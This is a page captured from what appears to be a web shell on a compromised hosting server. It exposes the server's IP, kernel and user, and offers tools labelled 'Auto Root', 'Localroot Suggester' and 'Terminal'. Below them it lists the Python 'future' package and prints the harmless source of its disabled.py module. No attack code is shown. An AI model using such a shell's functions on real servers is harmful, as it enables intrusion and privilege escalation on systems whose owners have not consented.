Linux newlinux5.pouyasazan.org 3.10.0-962.3.2.lve1.5.60.el7.x86_64 #1 SMP Fri Jul 23 07:07:00 EDT 2021 x86_64
LiteSpeed
Server IP : 88.99.66.243 & Your IP : 216.73.216.178
Domains :
Cant Read [ /etc/named.conf ]
User : wdbbsgxf
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
python2.7 /
site-packages /
future /
builtins /
Delete
Unzip
Name
Size
Permission
Date
Action
__init__.py
1.65
KB
-rw-r--r--
2019-10-31 04:04
__init__.pyc
1.49
KB
-rw-r--r--
2020-01-24 15:25
__init__.pyo
1.49
KB
-rw-r--r--
2020-01-24 15:25
disabled.py
2.06
KB
-rw-r--r--
2019-10-31 04:04
disabled.pyc
2.54
KB
-rw-r--r--
2020-01-24 15:25
disabled.pyo
2.54
KB
-rw-r--r--
2020-01-24 15:25
iterators.py
1.36
KB
-rw-r--r--
2019-10-31 04:04
iterators.pyc
1.58
KB
-rw-r--r--
2020-01-24 15:25
iterators.pyo
1.58
KB
-rw-r--r--
2020-01-24 15:25
misc.py
4.44
KB
-rw-r--r--
2019-10-31 04:04
misc.pyc
3.37
KB
-rw-r--r--
2020-01-24 15:25
misc.pyo
3.37
KB
-rw-r--r--
2020-01-24 15:25
new_min_max.py
1.72
KB
-rw-r--r--
2019-10-31 04:26
new_min_max.pyc
1.96
KB
-rw-r--r--
2020-01-24 15:25
new_min_max.pyo
1.96
KB
-rw-r--r--
2020-01-24 15:25
newnext.py
1.96
KB
-rw-r--r--
2019-10-31 04:04
newnext.pyc
2.07
KB
-rw-r--r--
2020-01-24 15:25
newnext.pyo
2.07
KB
-rw-r--r--
2020-01-24 15:25
newround.py
3.11
KB
-rw-r--r--
2019-10-31 04:26
newround.pyc
3.23
KB
-rw-r--r--
2020-01-24 15:25
newround.pyo
3.23
KB
-rw-r--r--
2020-01-24 15:25
newsuper.py
4.05
KB
-rw-r--r--
2019-10-31 04:04
newsuper.pyc
3.16
KB
-rw-r--r--
2020-01-24 15:25
newsuper.pyo
3.16
KB
-rw-r--r--
2020-01-24 15:25
Save
Rename
""" This disables builtin functions (and one exception class) which are removed from Python 3.3. This module is designed to be used like this:: from future.builtins.disabled import * This disables the following obsolete Py2 builtin functions:: apply, cmp, coerce, execfile, file, input, long, raw_input, reduce, reload, unicode, xrange We don't hack __builtin__, which is very fragile because it contaminates imported modules too. Instead, we just create new functions with the same names as the obsolete builtins from Python 2 which raise NameError exceptions when called. Note that both ``input()`` and ``raw_input()`` are among the disabled functions (in this module). Although ``input()`` exists as a builtin in Python 3, the Python 2 ``input()`` builtin is unsafe to use because it can lead to shell injection. Therefore we shadow it by default upon ``from future.builtins.disabled import *``, in case someone forgets to import our replacement ``input()`` somehow and expects Python 3 semantics. See the ``future.builtins.misc`` module for a working version of ``input`` with Python 3 semantics. (Note that callable() is not among the functions disabled; this was reintroduced into Python 3.2.) This exception class is also disabled: StandardError """ from __future__ import division, absolute_import, print_function from future import utils OBSOLETE_BUILTINS = ['apply', 'chr', 'cmp', 'coerce', 'execfile', 'file', 'input', 'long', 'raw_input', 'reduce', 'reload', 'unicode', 'xrange', 'StandardError'] def disabled_function(name): ''' Returns a function that cannot be called ''' def disabled(*args, **kwargs): ''' A function disabled by the ``future`` module. This function is no longer a builtin in Python 3. ''' raise NameError('obsolete Python 2 builtin {0} is disabled'.format(name)) return disabled if not utils.PY3: for fname in OBSOLETE_BUILTINS: locals()[fname] = disabled_function(fname) __all__ = OBSOLETE_BUILTINS else: __all__ = []